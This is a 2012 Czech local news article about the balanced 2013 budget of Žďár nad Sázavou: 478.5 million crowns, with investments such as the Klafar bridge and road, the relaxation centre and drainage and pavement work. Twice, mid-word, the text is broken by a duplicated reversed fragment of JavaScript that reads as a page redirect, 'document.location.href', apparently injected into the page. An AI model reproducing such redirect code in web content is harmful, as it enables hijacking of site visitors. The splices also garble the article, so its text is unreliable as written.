Žďár nad Sázavou, zdar nad sazavou, aktuality, rozpočet
Rainbow page separator

Ve Žďáře připravili rozpočet

Sobota, 24. listopadu 2012

Žďár nad Sázavou / Vyrovnaný rozpočet pro rok 2013 ve výši 478,5 milionu korun připravili ve Žďáře nad Sázavou. Radní ho mají schvalovat 13. prosince. Na investice je v rozpočtu vyčleněno asi 178 milionů korun, zbytek je určen na zajištění provozu města. Žďárští při tvorbě rozpočtu sáhli na svoje úspory z předchozích let, do kolonky příjmů přidali 139 milionů korun.

Nejdražší investiční akcí příštího roku je most a silnice na Klafar za více než osmdesát milionů korun, z nichž ale posledních devět bude splatných až v roce 2014.

Dvaatřicet milionů bude muset vedení žďárské radnice doplatit za vybudován relaxačního centra, chystá i odvedení balastních vod pod bazénem, v okolí průmyslovky a polikliniky do po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toka Staviště. To si vyžádá sedm milionů. Osm milionů korun zase rekonstrukce chodníku v ulici Bratří Čapků.

Kromě řady dalších investičních akcí menšího rozsahu se Žďárští chtějí v roce 2013 zároveň věnovat přípravě investic na další rok, které zatím nejsou v rozpočtu zahrnuty. „Rádi bychom začali, ale pouze pokud se podaří získat dotace,“ sdělil mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Žďáru nad Sázavou Jaromír Brychta. Jde o přípravu rekonstrukce náměstí Republiky, který by stála přibližně třicet milionů korun, s možnou dotační podporou až 85 procent nákladů, případně o rekreační areál u Pilské nádrže za třiadvacet milionů korun.